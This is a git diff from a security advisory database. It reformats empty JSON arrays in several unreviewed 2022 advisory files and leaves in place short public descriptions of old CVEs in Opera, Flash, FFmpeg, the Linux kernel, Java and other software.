a/advisories/unreviewed/2022/05/GHSA-rrhw-9hrp-fr9r/GHSA-rrhw-9hrp-fr9r.json +++ b/advisories/unreviewed/2022/05/GHSA-rrhw-9hrp-fr9r/GHSA-rrhw-9hrp-fr9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rv23-xwvf-5q5q/GHSA-rv23-xwvf-5q5q.json b/advisories/unreviewed/2022/05/GHSA-rv23-xwvf-5q5q/GHSA-rv23-xwvf-5q5q.json index 0f6fda1b3d7..28cae94ba73 100644 --- a/advisories/unreviewed/2022/05/GHSA-rv23-xwvf-5q5q/GHSA-rv23-xwvf-5q5q.json +++ b/advisories/unreviewed/2022/05/GHSA-rv23-xwvf-5q5q/GHSA-rv23-xwvf-5q5q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rvcf-j2hj-x49c/GHSA-rvcf-j2hj-x49c.json b/advisories/unreviewed/2022/05/GHSA-rvcf-j2hj-x49c/GHSA-rvcf-j2hj-x49c.json index fff1b1a15b5..788fb5c13fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-rvcf-j2hj-x49c/GHSA-rvcf-j2hj-x49c.json +++ b/advisories/unreviewed/2022/05/GHSA-rvcf-j2hj-x49c/GHSA-rvcf-j2hj-x49c.json @@ -7,12 +7,8 @@ "CVE-2010-2455" ], "details": "Opera does not properly manage the address bar between the request to open a URL and the retrieval of the new document's content, which might allow remote attackers to conduct spoofing attacks via a crafted HTML document, a related issue to CVE-2010-1206.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rx65-35rg-w842/GHSA-rx65-35rg-w842.json b/advisories/unreviewed/2022/05/GHSA-rx65-35rg-w842/GHSA-rx65-35rg-w842.json index 27267a8d401..ff3a3e00ad5 100644 --- a/advisories/unreviewed/2022/05/GHSA-rx65-35rg-w842/GHSA-rx65-35rg-w842.json +++ b/advisories/unreviewed/2022/05/GHSA-rx65-35rg-w842/GHSA-rx65-35rg-w842.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rxj8-h8vh-46f3/GHSA-rxj8-h8vh-46f3.json b/advisories/unreviewed/2022/05/GHSA-rxj8-h8vh-46f3/GHSA-rxj8-h8vh-46f3.json index 882617dadc8..83bc2b9868e 100644 --- a/advisories/unreviewed/2022/05/GHSA-rxj8-h8vh-46f3/GHSA-rxj8-h8vh-46f3.json +++ b/advisories/unreviewed/2022/05/GHSA-rxj8-h8vh-46f3/GHSA-rxj8-h8vh-46f3.json @@ -7,12 +7,8 @@ "CVE-2010-2661" ], "details": "Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict access to the full pathname of a file selected for upload, which allows remote attackers to obtain potentially sensitive information via unspecified DOM manipulations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v49r-2h6g-2ghv/GHSA-v49r-2h6g-2ghv.json b/advisories/unreviewed/2022/05/GHSA-v49r-2h6g-2ghv/GHSA-v49r-2h6g-2ghv.json index 8c844872abe..0ed91be41b2 100644 --- a/advisories/unreviewed/2022/05/GHSA-v49r-2h6g-2ghv/GHSA-v49r-2h6g-2ghv.json +++ b/advisories/unreviewed/2022/05/GHSA-v49r-2h6g-2ghv/GHSA-v49r-2h6g-2ghv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v73v-jphg-x43p/GHSA-v73v-jphg-x43p.json b/advisories/unreviewed/2022/05/GHSA-v73v-jphg-x43p/GHSA-v73v-jphg-x43p.json index 34a43e62afe..b1e622658eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-v73v-jphg-x43p/GHSA-v73v-jphg-x43p.json +++ b/advisories/unreviewed/2022/05/GHSA-v73v-jphg-x43p/GHSA-v73v-jphg-x43p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v7m5-7qjq-2hm5/GHSA-v7m5-7qjq-2hm5.json b/advisories/unreviewed/2022/05/GHSA-v7m5-7qjq-2hm5/GHSA-v7m5-7qjq-2hm5.json index 78d526448d7..62fcb53e7ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-v7m5-7qjq-2hm5/GHSA-v7m5-7qjq-2hm5.json +++ b/advisories/unreviewed/2022/05/GHSA-v7m5-7qjq-2hm5/GHSA-v7m5-7qjq-2hm5.json @@ -7,12 +7,8 @@ "CVE-2011-2417" ], "details": "Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2425.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v7xw-2w8g-gwpm/GHSA-v7xw-2w8g-gwpm.json b/advisories/unreviewed/2022/05/GHSA-v7xw-2w8g-gwpm/GHSA-v7xw-2w8g-gwpm.json index 8d9300f2717..e2ebb075c2c 100644 --- a/advisories/unreviewed/2022/05/GHSA-v7xw-2w8g-gwpm/GHSA-v7xw-2w8g-gwpm.json +++ b/advisories/unreviewed/2022/05/GHSA-v7xw-2w8g-gwpm/GHSA-v7xw-2w8g-gwpm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v7xx-jmw9-h6xc/GHSA-v7xx-jmw9-h6xc.json b/advisories/unreviewed/2022/05/GHSA-v7xx-jmw9-h6xc/GHSA-v7xx-jmw9-h6xc.json index 13ee7819c2a..c784f94bf5a 100644 --- a/advisories/unreviewed/2022/05/GHSA-v7xx-jmw9-h6xc/GHSA-v7xx-jmw9-h6xc.json +++ b/advisories/unreviewed/2022/05/GHSA-v7xx-jmw9-h6xc/GHSA-v7xx-jmw9-h6xc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v98x-wm9v-cm22/GHSA-v98x-wm9v-cm22.json b/advisories/unreviewed/2022/05/GHSA-v98x-wm9v-cm22/GHSA-v98x-wm9v-cm22.json index 6d1d65bef84..e25558c5ad7 100644 --- a/advisories/unreviewed/2022/05/GHSA-v98x-wm9v-cm22/GHSA-v98x-wm9v-cm22.json +++ b/advisories/unreviewed/2022/05/GHSA-v98x-wm9v-cm22/GHSA-v98x-wm9v-cm22.json @@ -7,12 +7,8 @@ "CVE-2012-2803" ], "details": "Double free vulnerability in the mpeg_decode_frame function in libavcodec/mpeg12.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, has unknown impact and attack vectors, related to resetting the data size value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v9fc-q9c7-xg68/GHSA-v9fc-q9c7-xg68.json b/advisories/unreviewed/2022/05/GHSA-v9fc-q9c7-xg68/GHSA-v9fc-q9c7-xg68.json index 09c0223bef5..992b01cf9bd 100644 --- a/advisories/unreviewed/2022/05/GHSA-v9fc-q9c7-xg68/GHSA-v9fc-q9c7-xg68.json +++ b/advisories/unreviewed/2022/05/GHSA-v9fc-q9c7-xg68/GHSA-v9fc-q9c7-xg68.json @@ -7,12 +7,8 @@ "CVE-2013-1003" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v9gp-hvmh-g79c/GHSA-v9gp-hvmh-g79c.json b/advisories/unreviewed/2022/05/GHSA-v9gp-hvmh-g79c/GHSA-v9gp-hvmh-g79c.json index 24b8bc72968..2a0cda7b6e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-v9gp-hvmh-g79c/GHSA-v9gp-hvmh-g79c.json +++ b/advisories/unreviewed/2022/05/GHSA-v9gp-hvmh-g79c/GHSA-v9gp-hvmh-g79c.json @@ -7,12 +7,8 @@ "CVE-2010-2884" ], "details": "Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android; authplay.dll in Adobe Reader and Acrobat 9.x before 9.4; and authplay.dll in Adobe Reader and Acrobat 8.x before 8.2.5 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in September 2010.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -124,9 +120,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v9rx-3h6j-mv5m/GHSA-v9rx-3h6j-mv5m.json b/advisories/unreviewed/2022/05/GHSA-v9rx-3h6j-mv5m/GHSA-v9rx-3h6j-mv5m.json index 5b218316dd6..9f73c2abfce 100644 --- a/advisories/unreviewed/2022/05/GHSA-v9rx-3h6j-mv5m/GHSA-v9rx-3h6j-mv5m.json +++ b/advisories/unreviewed/2022/05/GHSA-v9rx-3h6j-mv5m/GHSA-v9rx-3h6j-mv5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vc5r-c496-3px9/GHSA-vc5r-c496-3px9.json b/advisories/unreviewed/2022/05/GHSA-vc5r-c496-3px9/GHSA-vc5r-c496-3px9.json index a39df26f040..e360b66e751 100644 --- a/advisories/unreviewed/2022/05/GHSA-vc5r-c496-3px9/GHSA-vc5r-c496-3px9.json +++ b/advisories/unreviewed/2022/05/GHSA-vc5r-c496-3px9/GHSA-vc5r-c496-3px9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vcw3-c24j-h6v5/GHSA-vcw3-c24j-h6v5.json b/advisories/unreviewed/2022/05/GHSA-vcw3-c24j-h6v5/GHSA-vcw3-c24j-h6v5.json index 68f230031e3..c8038ad0161 100644 --- a/advisories/unreviewed/2022/05/GHSA-vcw3-c24j-h6v5/GHSA-vcw3-c24j-h6v5.json +++ b/advisories/unreviewed/2022/05/GHSA-vcw3-c24j-h6v5/GHSA-vcw3-c24j-h6v5.json @@ -7,12 +7,8 @@ "CVE-2015-6937" ], "details": "The __rds_conn_create function in net/rds/connection.c in the Linux kernel through 4.2.3 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -144,9 +140,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vf2x-x882-rq24/GHSA-vf2x-x882-rq24.json b/advisories/unreviewed/2022/05/GHSA-vf2x-x882-rq24/GHSA-vf2x-x882-rq24.json index bb643a0a7bc..08991e3fa38 100644 --- a/advisories/unreviewed/2022/05/GHSA-vf2x-x882-rq24/GHSA-vf2x-x882-rq24.json +++ b/advisories/unreviewed/2022/05/GHSA-vf2x-x882-rq24/GHSA-vf2x-x882-rq24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vfrm-87wr-xvjf/GHSA-vfrm-87wr-xvjf.json b/advisories/unreviewed/2022/05/GHSA-vfrm-87wr-xvjf/GHSA-vfrm-87wr-xvjf.json index 4454bede953..ab49da21808 100644 --- a/advisories/unreviewed/2022/05/GHSA-vfrm-87wr-xvjf/GHSA-vfrm-87wr-xvjf.json +++ b/advisories/unreviewed/2022/05/GHSA-vfrm-87wr-xvjf/GHSA-vfrm-87wr-xvjf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vgpc-pfpm-223h/GHSA-vgpc-pfpm-223h.json b/advisories/unreviewed/2022/05/GHSA-vgpc-pfpm-223h/GHSA-vgpc-pfpm-223h.json index b57c57406bf..14e7bd5c9a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-vgpc-pfpm-223h/GHSA-vgpc-pfpm-223h.json +++ b/advisories/unreviewed/2022/05/GHSA-vgpc-pfpm-223h/GHSA-vgpc-pfpm-223h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vh77-9c84-463g/GHSA-vh77-9c84-463g.json b/advisories/unreviewed/2022/05/GHSA-vh77-9c84-463g/GHSA-vh77-9c84-463g.json index 0253a8306ee..b0eaadf39d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-vh77-9c84-463g/GHSA-vh77-9c84-463g.json +++ b/advisories/unreviewed/2022/05/GHSA-vh77-9c84-463g/GHSA-vh77-9c84-463g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vhcx-wrgv-8hv9/GHSA-vhcx-wrgv-8hv9.json b/advisories/unreviewed/2022/05/GHSA-vhcx-wrgv-8hv9/GHSA-vhcx-wrgv-8hv9.json index 2c395afc6be..c3b731eb326 100644 --- a/advisories/unreviewed/2022/05/GHSA-vhcx-wrgv-8hv9/GHSA-vhcx-wrgv-8hv9.json +++ b/advisories/unreviewed/2022/05/GHSA-vhcx-wrgv-8hv9/GHSA-vhcx-wrgv-8hv9.json @@ -7,12 +7,8 @@ "CVE-2012-2775" ], "details": "Unspecified vulnerability in the read_var_block_data function in libavcodec/alsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to a large order and an \"out of array write in quant_cof.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vhpv-9vr4-2gvr/GHSA-vhpv-9vr4-2gvr.json b/advisories/unreviewed/2022/05/GHSA-vhpv-9vr4-2gvr/GHSA-vhpv-9vr4-2gvr.json index e349243fe85..2a57be26f93 100644 --- a/advisories/unreviewed/2022/05/GHSA-vhpv-9vr4-2gvr/GHSA-vhpv-9vr4-2gvr.json +++ b/advisories/unreviewed/2022/05/GHSA-vhpv-9vr4-2gvr/GHSA-vhpv-9vr4-2gvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vj8f-hqf8-qh5x/GHSA-vj8f-hqf8-qh5x.json b/advisories/unreviewed/2022/05/GHSA-vj8f-hqf8-qh5x/GHSA-vj8f-hqf8-qh5x.json index 24f01125401..fa66ba0da16 100644 --- a/advisories/unreviewed/2022/05/GHSA-vj8f-hqf8-qh5x/GHSA-vj8f-hqf8-qh5x.json +++ b/advisories/unreviewed/2022/05/GHSA-vj8f-hqf8-qh5x/GHSA-vj8f-hqf8-qh5x.json @@ -7,12 +7,8 @@ "CVE-2010-3559" ], "details": "Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable researcher that this involves an incorrect sign extension in the HeadspaceSoundbank.nGetName function, which allows attackers to execute arbitrary code via a crafted BANK record that leads to a buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -92,9 +88,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vm69-m74c-qwvm/GHSA-vm69-m74c-qwvm.json b/advisories/unreviewed/2022/05/GHSA-vm69-m74c-qwvm/GHSA-vm69-m74c-qwvm.json index b5d86b9f576..ff1fc773fab 100644 --- a/advisories/unreviewed/2022/05/GHSA-vm69-m74c-qwvm/GHSA-vm69-m74c-qwvm.json +++ b/advisories/unreviewed/2022/05/GHSA-vm69-m74c-qwvm/GHSA-vm69-m74c-qwvm.json @@ -7,12 +7,8 @@ "CVE-2011-0560" ], "details": "Adobe Flash Player before 10.2.152.26 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0559, CVE-2011-0561, CVE-2011-0571, CVE-2011-0572, CVE-2011-0573, CVE-2011-0574, CVE-2011-0578, CVE-2011-0607, and CVE-2011-0608.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vm96-4qrg-6r96/GHSA-vm96-4qrg-6r96.json b/advisories/unreviewed/2022/05/GHSA-vm96-4qrg-6r96/GHSA-vm96-4qrg-6r96.json index aeacfea418b..8ddf75ae67d 100644 --- a/advisories/unreviewed/2022/05/GHSA-vm96-4qrg-6r96/GHSA-vm96-4qrg-6r96.json +++ b/advisories/unreviewed/2022/05/GHSA-vm96-4qrg-6r96/GHSA-vm96-4qrg-6r96.json @@ -7,12 +7,8 @@ "CVE-2010-2183" ], "details": "Integer overflow in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2170 and CVE-2010-2181.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -136,9 +132,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vmqj-vh6g-cjq3/GHSA-vmqj-vh6g-cjq3.json b/advisories/unreviewed/2022/05/GHSA-vmqj-vh6g-cjq3/GHSA-vmqj-vh6g-cjq3.json index 3778b703852..77d36e57db9 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmqj-vh6g-cjq3/GHSA-vmqj-vh6g-cjq3.json +++ b/advisories/unreviewed/2022/05/GHSA-vmqj-vh6g-cjq3/GHSA-vmqj-vh6g-cjq3.json @@ -7,12 +7,8 @@ "CVE-2011-0591" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vp8j-2cg9-6pvv/GHSA-vp8j-2cg9-6pvv.json b/advisories/unreviewed/2022/05/GHSA-vp8j-2cg9-6pvv/GHSA-vp8j-2cg9-6pvv.json index 3f9ff7c2bba..d2d46324043 100644 --- a/advisories/unreviewed/2022/05/GHSA-vp8j-2cg9-6pvv/GHSA-vp8j-2cg9-6pvv.json +++ b/advisories/unreviewed/2022/05/GHSA-vp8j-2cg9-6pvv/GHSA-vp8j-2cg9-6pvv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vph8-g3v4-rq6w/GHSA-vph8-g3v4-rq6w.json b/advisories/unreviewed/2022/05/GHSA-vph8-g3v4-rq6w/GHSA-vph8-g3v4-rq6w.json index 448b149382e..8143e77bb53 100644 --- a/advisories/unreviewed/2022/05/GHSA-vph8-g3v4-rq6w/GHSA-vph8-g3v4-rq6w.json +++ b/advisories/unreviewed/2022/05/GHSA-vph8-g3v4-rq6w/GHSA-vph8-g3v4-rq6w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vprp-wv7r-hv9r/GHSA-vprp-wv7r-hv9r.json b/advisories/unreviewed/2022/05/GHSA-vprp-wv7r-hv9r/GHSA-vprp-wv7r-hv9r.json index 41d60144848..db0562f9d9d 100644 --- a/advisories/unreviewed/2022/05/GHSA-vprp-wv7r-hv9r/GHSA-vprp-wv7r-hv9r.json +++ b/advisories/unreviewed/2022/05/GHSA-vprp-wv7r-hv9r/GHSA-vprp-wv7r-hv9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vq8r-9572-hxgv/GHSA-vq8r-9572-hxgv.json b/advisories/unreviewed/2022/05/GHSA-vq8r-9572-hxgv/GHSA-vq8r-9572-hxgv.json index 6991d1b7c99..cc52497ffeb 100644 --- a/advisories/unreviewed/2022/05/GHSA-vq8r-9572-hxgv/GHSA-vq8r-9572-hxgv.json +++ b/advisories/unreviewed/2022/05/GHSA-vq8r-9572-hxgv/GHSA-vq8r-9572-hxgv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vw72-3qh4-x2wh/GHSA-vw72-3qh4-x2wh.json b/advisories/unreviewed/2022/05/GHSA-vw72-3qh4-x2wh/GHSA-vw72-3qh4-x2wh.json index 75a62be512d..6b21322f105 100644 --- a/advisories/unreviewed/2022/05/GHSA-vw72-3qh4-x2wh/GHSA-vw72-3qh4-x2wh.json +++ b/advisories/unreviewed/2022/05/GHSA-vw72-3qh4-x2wh/GHSA-vw72-3qh4-x2wh.json @@ -7,12 +7,8 @@ "CVE-2012-2799" ], "details": "Unspecified vulnerability in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to the \"put bit buffer when num_saved_bits is reset.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vwr9-j7q7-m34v/GHSA-vwr9-j7q7-m34v.json b/advisories/unreviewed/2022/05/GHSA-vwr9-j7q7-m34v/GHSA-vwr9-j7q7-m34v.json index c6ec04734a4..dc64431e7e7 100644 --- a/advisories/unreviewed/2022/05/GHSA-vwr9-j7q7-m34v/GHSA-vwr9-j7q7-m34v.json +++ b/advisories/unreviewed/2022/05/GHSA-vwr9-j7q7-m34v/GHSA-vwr9-j7q7-m34v.json @@ -7,12 +7,8 @@ "CVE-2013-1014" ], "details": "Apple iTunes before 11.0.3 does not properly verify X.509 certificates, which allows man-in-the-middle attackers to spoof HTTPS servers via an arbitrary valid certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vxh4-g5cx-6hwf/GHSA-vxh4-g5cx-6hwf.json b/advisories/unreviewed/2022/05/GHSA-vxh4-g5cx-6hwf/GHSA-vxh4-g5cx-6hwf.json index c51d55d0715..62dc15dbe1d 100644 --- a/advisories/unreviewed/2022/05/GHSA-vxh4-g5cx-6hwf/GHSA-vxh4-g5cx-6hwf.json +++ b/advisories/unreviewed/2022/05/GHSA-vxh4-g5cx-6hwf/GHSA-vxh4-g5cx-6hwf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vxx9-4mc9-6rmp/GHSA-vxx9-4mc9-6rmp.json b/advisories/unreviewed/2022/05/GHSA-vxx9-4mc9-6rmp/GHSA-vxx9-4mc9-6rmp.json index 3da6418474c..b75a02c2264 100644 --- a/advisories/unreviewed/2022/05/GHSA-vxx9-4mc9-6rmp/GHSA-vxx9-4mc9-6rmp.json +++ b/advisories/unreviewed/2022/05/GHSA-vxx9-4mc9-6rmp/GHSA-vxx9-4mc9-6rmp.json @@ -7,12 +7,8 @@ "CVE-2012-3074" ], "details": "An unspecified API on Cisco TelePresence Immersive Endpoint Devices before 1.9.1 allows remote attackers to execute arbitrary commands by leveraging certain adjacency and sending a malformed request on TCP port 61460, aka Bug ID CSCtz38382.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w2j7-xp4w-prx7/GHSA-w2j7-xp4w-prx7.json b/advisories/unreviewed/2022/05/GHSA-w2j7-xp4w-prx7/GHSA-w2j7-xp4w-prx7.json index b122a80da1c..9fe96f3076a 100644 --- a/advisories/unreviewed/2022/05/GHSA-w2j7-xp4w-prx7/GHSA-w2j7-xp4w-prx7.json +++ b/advisories/unreviewed/2022/05/GHSA-w2j7-xp4w-prx7/GHSA-w2j7-xp4w-prx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w358-hq9x-mwxh/GHSA-w358-hq9x-mwxh.json b/advisories/unreviewed/2022/05/GHSA-w358-hq9x-mwxh/GHSA-w358-hq9x-mwxh.json index f62edf69446..d518639410a 100644 